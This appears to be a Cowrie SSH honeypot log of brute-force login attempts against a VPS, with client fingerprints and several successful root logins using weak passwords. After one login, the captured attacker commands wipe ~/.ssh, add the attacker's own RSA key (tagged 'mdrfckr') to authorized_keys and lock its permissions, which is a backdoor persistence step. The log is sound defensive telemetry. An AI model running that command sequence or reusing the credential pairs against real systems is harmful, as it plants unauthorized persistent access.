{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:25.958310Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41028,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b2fa72a1208","protocol":"ssh","message":"New connection: 212.227.235.229:41028 (1.2.3.4:22) [session: 8b2fa72a1208]","sensor":"my-vps","timestamp":"2025-08-26T23:29:26.275876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:29:26.276823Z","src_ip":"212.227.235.229","session":"8b2fa72a1208"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:29:26.614995Z","src_ip":"212.227.235.229","session":"8b2fa72a1208"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T23:29:28.012359Z","src_ip":"212.227.235.229","session":"8b2fa72a1208"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:29.353352Z","src_ip":"212.227.235.229","session":"8b2fa72a1208"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41852,"dst_ip":"1.2.3.4","dst_port":22,"session":"2268d1fbbe04","protocol":"ssh","message":"New connection: 212.227.235.229:41852 (1.2.3.4:22) [session: 2268d1fbbe04]","sensor":"my-vps","timestamp":"2025-08-26T23:29:29.673965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:29:29.674620Z","src_ip":"212.227.235.229","session":"2268d1fbbe04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:29:29.990536Z","src_ip":"212.227.235.229","session":"2268d1fbbe04"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:29:31.293168Z","src_ip":"212.227.235.229","session":"2268d1fbbe04"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:31.610618Z","src_ip":"212.227.235.229","session":"2268d1fbbe04"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:31.623920Z","src_ip":"212.227.235.229","session":"13da6f412365"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42644,"dst_ip":"1.2.3.4","dst_port":22,"session":"523cd884f162","protocol":"ssh","message":"New connection: 212.227.235.229:42644 (1.2.3.4:22) [session: 523cd884f162]","sensor":"my-vps","timestamp":"2025-08-26T23:29:38.975620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:29:40.435391Z","src_ip":"212.227.235.229","session":"523cd884f162"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:29:40.466436Z","src_ip":"212.227.235.229","session":"523cd884f162"}
{"eventid":"cowrie.login.failed","username":"test","password":"123qwerty","message":"login attempt [test/123qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T23:29:45.534499Z","src_ip":"212.227.235.229","session":"523cd884f162"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:29:47.932778Z","src_ip":"212.227.235.229","session":"523cd884f162"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53338,"dst_ip":"1.2.3.4","dst_port":22,"session":"f53ddafc8ac2","protocol":"ssh","message":"New connection: 212.227.235.229:53338 (1.2.3.4:22) [session: f53ddafc8ac2]","sensor":"my-vps","timestamp":"2025-08-26T23:31:56.664876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:31:57.897252Z","src_ip":"212.227.235.229","session":"f53ddafc8ac2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:31:57.899202Z","src_ip":"212.227.235.229","session":"f53ddafc8ac2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39922,"dst_ip":"1.2.3.4","dst_port":22,"session":"90fdebdbafa8","protocol":"ssh","message":"New connection: 212.227.235.229:39922 (1.2.3.4:22) [session: 90fdebdbafa8]","sensor":"my-vps","timestamp":"2025-08-26T23:32:02.902042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:32:02.902890Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:32:03.234073Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.login.failed","username":"test","password":"qwerty","message":"login attempt [test/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T23:32:04.442647Z","src_ip":"212.227.235.229","session":"f53ddafc8ac2"}
{"eventid":"cowrie.login.success","username":"root","password":"@WSXZAQ!","message":"login attempt [root/@WSXZAQ!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:32:04.595014Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:32:05.331380Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:32:05.332291Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T23:32:05.333449Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:05.666536Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46036,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1bba18174de","protocol":"ssh","message":"New connection: 212.227.235.229:46036 (1.2.3.4:22) [session: c1bba18174de]","sensor":"my-vps","timestamp":"2025-08-26T23:32:06.054415Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T23:32:06.055204Z","src_ip":"212.227.235.229","session":"c1bba18174de"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:06.056416Z","src_ip":"212.227.235.229","session":"c1bba18174de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:32:06.402920Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T23:32:06.403691Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T23:32:06.733938Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:06.734898Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:07.005513Z","src_ip":"212.227.235.229","session":"f53ddafc8ac2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45522,"dst_ip":"1.2.3.4","dst_port":22,"session":"950ce811c59b","protocol":"ssh","message":"New connection: 212.227.235.229:45522 (1.2.3.4:22) [session: 950ce811c59b]","sensor":"my-vps","timestamp":"2025-08-26T23:32:07.062858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:32:07.065568Z","src_ip":"212.227.235.229","session":"950ce811c59b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:32:07.394014Z","src_ip":"212.227.235.229","session":"950ce811c59b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T23:32:08.724692Z","src_ip":"212.227.235.229","session":"950ce811c59b"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:10.059680Z","src_ip":"212.227.235.229","session":"950ce811c59b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49910,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd8ab0e6586","protocol":"ssh","message":"New connection: 212.227.235.229:49910 (1.2.3.4:22) [session: ffd8ab0e6586]","sensor":"my-vps","timestamp":"2025-08-26T23:32:10.386701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T23:32:10.387584Z","src_ip":"212.227.235.229","session":"ffd8ab0e6586"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T23:32:10.719703Z","src_ip":"212.227.235.229","session":"ffd8ab0e6586"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:32:12.089929Z","src_ip":"212.227.235.229","session":"ffd8ab0e6586"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:12.419098Z","src_ip":"212.227.235.229","session":"90fdebdbafa8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:12.420338Z","src_ip":"212.227.235.229","session":"ffd8ab0e6586"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37888,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba12f4006849","protocol":"ssh","message":"New connection: 212.227.125.160:37888 (1.2.3.4:22) [session: ba12f4006849]","sensor":"my-vps","timestamp":"2025-08-26T23:32:19.332919Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T23:32:19.333756Z","src_ip":"212.227.125.160","session":"ba12f4006849"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:19.334524Z","src_ip":"212.227.125.160","session":"ba12f4006849"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":27416,"dst_ip":"1.2.3.4","dst_port":22,"session":"c99b31ae5de3","protocol":"ssh","message":"New connection: 80.94.95.15:27416 (1.2.3.4:22) [session: c99b31ae5de3]","sensor":"my-vps","timestamp":"2025-08-26T23:32:30.769983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T23:32:30.771307Z","src_ip":"80.94.95.15","session":"c99b31ae5de3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T23:32:31.189712Z","src_ip":"80.94.95.15","session":"c99b31ae5de3"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey","message":"login attempt [chelsey/chelsey] failed","sensor":"my-vps","timestamp":"2025-08-26T23:32:32.108441Z","src_ip":"80.94.95.15","session":"c99b31ae5de3"}
